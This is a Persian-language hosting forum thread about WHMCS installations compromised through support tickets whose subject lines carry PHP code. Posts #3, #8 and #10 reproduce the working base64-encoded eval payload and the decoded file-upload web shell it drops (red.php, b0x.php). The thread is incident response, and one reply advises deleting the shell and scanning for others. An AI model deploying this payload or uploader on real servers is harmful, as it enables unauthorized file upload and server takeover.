صفحه 1 از 16 1234511 ... آخرینآخرین
نمایش نتایج: از شماره 1 تا 10 , از مجموع 155

موضوع: هک شدن از طریق whmcs5

  1. #1
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    رشت
    نوشته ها
    325
    تشکر تشکر کرده 
    160
    تشکر تشکر شده 
    378
    تشکر شده در
    232 پست

    پیش فرض هک شدن از طریق whmcs5

    سلام الان دو روزه که از طریق یه تیکت هک میشم یه نفر میاد تو سایتم عضو میشه یه تیکت برام میفرسته که در موضوع تیکت یه کد php میزنه بعد راحت میاد داخل whm من جالبه بدونید whmcs من آخرین ورژن و با لایسنس هست کدشو الان ندارم چون یوزرشو حذف کردم تیکتشم حذف شد

  2. تعداد تشکر ها ازmaryam1 به دلیل پست مفید


  3. # ADS




     

  4. #2
    عضو انجمن
    تاریخ عضویت
    Jul 2009
    نوشته ها
    415
    تشکر تشکر کرده 
    265
    تشکر تشکر شده 
    472
    تشکر شده در
    369 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    به whmcs ریپورت بدید سریع

  5. #3
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    رشت
    نوشته ها
    325
    تشکر تشکر کرده 
    160
    تشکر تشکر شده 
    378
    تشکر شده در
    232 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    چه طوری ریپورت بدم؟
    این کدی هست که داخل موضوع برام تیکت میکنه
    کد:
    {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs  InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

  6. تعداد تشکر ها از maryam1 به دلیل پست مفید


  7. #4
    عضو انجمن vps-baran.ir آواتار ها
    تاریخ عضویت
    Dec 2011
    محل سکونت
    ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴
    نوشته ها
    595
    تشکر تشکر کرده 
    1,246
    تشکر تشکر شده 
    1,138
    تشکر شده در
    569 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    اگه این طوری باشه که ما نباید آخرین ورژن رو آپدیت کنیم . مشکل امنیتی داره

  8. تعداد تشکر ها از vps-baran.ir به دلیل پست مفید


  9. #5
    کاربر اخراج شده
    تاریخ عضویت
    Nov 2011
    محل سکونت
    رشت
    نوشته ها
    325
    تشکر تشکر کرده 
    160
    تشکر تشکر شده 
    378
    تشکر شده در
    232 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    اینارو ولش یکی لینک ریپورت رو به من بده
    این عربا دارن دونه دونه سایتهای ایرانی رو هک میکنن من اولیش نبودم آخریشم نیستم

    ---------- Post added at 11:34 AM ---------- Previous post was at 11:29 AM ----------

    فایل شل رو درون
    downloads/b0x.php
    میریزه
    الان کد رو دیکد کردم دیدم این فایل رو اجرا میکنه

  10. تعداد تشکر ها از maryam1 به دلیل پست مفید


  11. #6
    عضو انجمن m3hdi آواتار ها
    تاریخ عضویت
    Oct 2010
    محل سکونت
    IR
    نوشته ها
    468
    تشکر تشکر کرده 
    105
    تشکر تشکر شده 
    819
    تشکر شده در
    563 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    با سلام
    حضورتون عرض کنم کنه این مشکل مربوط به ورژن 5 نیست و در ورژن های پایینتر هم مشاهده شده
    در حال بررسی هستیم
    یه روز دنیا رو کولِـمون حـالا فصل رُکـودمون ...

  12. #7
    کاربر اخراج شده
    تاریخ عضویت
    Sep 2011
    نوشته ها
    115
    تشکر تشکر کرده 
    63
    تشکر تشکر شده 
    521
    تشکر شده در
    174 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    نقل قول نوشته اصلی توسط maryam1 نمایش پست ها
    سلام الان دو روزه که از طریق یه تیکت هک میشم یه نفر میاد تو سایتم عضو میشه یه تیکت برام میفرسته که در موضوع تیکت یه کد php میزنه بعد راحت میاد داخل whm من جالبه بدونید whmcs من آخرین ورژن و با لایسنس هست کدشو الان ندارم چون یوزرشو حذف کردم تیکتشم حذف شد
    چه جالب/واسه منم همین اتفاق افتاد اما چون باگ ها پچ شده بود هک نشدیم!

  13. #8
    عضو انجمن m3hdi آواتار ها
    تاریخ عضویت
    Oct 2010
    محل سکونت
    IR
    نوشته ها
    468
    تشکر تشکر کرده 
    105
    تشکر تشکر شده 
    819
    تشکر شده در
    563 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    خب
    و اما کار این آقای باهوش 6 ساله از Saudi Arabia Saudinet Saudi Telecom Company چیه ؟
    ایشون اومدن با این کد یک آپلودر در مسیر templates_c به نام red.php رایت کردند
    به این صورت :
    کد PHP:
    $code base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
    $fo fopen("templates_c/red.php","w");
    fwrite($fo,$code); 
    و محتوی $code هم به این شکل هست
    کد PHP:
    <?php
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo 
    '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( 
    $_POST['_upl'] == "Upload" ) {
        if(@
    copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
        else { echo 
    '<b>Upload GAGAL !!!</b><br><br>'; }
    }
    ?>
    بنابراین ابتدا فایل red.php رو حذف کنید و سپس فایل های دیگر رو به جهت عدم وجود شل چک کنید
    موفق باشید
    یه روز دنیا رو کولِـمون حـالا فصل رُکـودمون ...

  14. #9
    عضو انجمن Masoud.B آواتار ها
    تاریخ عضویت
    Dec 2009
    نوشته ها
    453
    تشکر تشکر کرده 
    246
    تشکر تشکر شده 
    875
    تشکر شده در
    497 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    تمام ورژن ها از این راه هک میشن هنوز هم پچ نشده . هر کی میگه هک نمیشیم بگه تا اطلاعات سایتش رو بهش بدم

  15. #10
    عضو انجمن vps-baran.ir آواتار ها
    تاریخ عضویت
    Dec 2011
    محل سکونت
    ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴
    نوشته ها
    595
    تشکر تشکر کرده 
    1,246
    تشکر تشکر شده 
    1,138
    تشکر شده در
    569 پست

    پیش فرض پاسخ : هک شدن از طریق whmcs5

    نقل قول نوشته اصلی توسط m3hdi نمایش پست ها
    خب
    و اما کار این آقای باهوش 6 ساله از Saudi Arabia Saudinet Saudi Telecom Company چیه ؟
    ایشون اومدن با این کد یک آپلودر در مسیر templates_c به نام red.php رایت کردند
    به این صورت :
    کد PHP:
    $code base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
    $fo fopen("templates_c/red.php","w");
    fwrite($fo,$code); 
    و محتوی $code هم به این شکل هست
    کد PHP:
    <?php
    echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
    echo 
    '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
    if( 
    $_POST['_upl'] == "Upload" ) {
        if(@
    copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
        else { echo 
    '<b>Upload GAGAL !!!</b><br><br>'; }
    }
    ?>
    بنابراین ابتدا فایل red.php رو حذف کنید و سپس فایل های دیگر رو به جهت عدم وجود شل چک کنید
    موفق باشید

    مطمئنی اگه این کار رو بکنیم دیگه هک نمیشیم؟

صفحه 1 از 16 1234511 ... آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. انتقال اطلاعات دامنه ها از whmcs5 به نسخه 6
    توسط farhadniyar در انجمن سوالات و مشکلات
    پاسخ ها: 0
    آخرين نوشته: June 9th, 2016, 18:03
  2. مشکل عدم در whmcs5.3.3
    توسط saman-00 در انجمن سوالات و مشکلات
    پاسخ ها: 3
    آخرين نوشته: April 18th, 2014, 14:44
  3. اضافه کردن تخفیف خاص در whmcs5
    توسط lived در انجمن سوالات و مشکلات
    پاسخ ها: 1
    آخرين نوشته: May 20th, 2012, 09:48
  4. خرید whmcs5.3 دیکد شده
    توسط RoobinaServer در انجمن سوالات و مشکلات
    پاسخ ها: 3
    آخرين نوشته: April 28th, 2012, 17:36
  5. یک مشکل در whmcs5.0.3
    توسط iranistar در انجمن سوالات و مشکلات
    پاسخ ها: 11
    آخرين نوشته: January 12th, 2012, 23:24

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •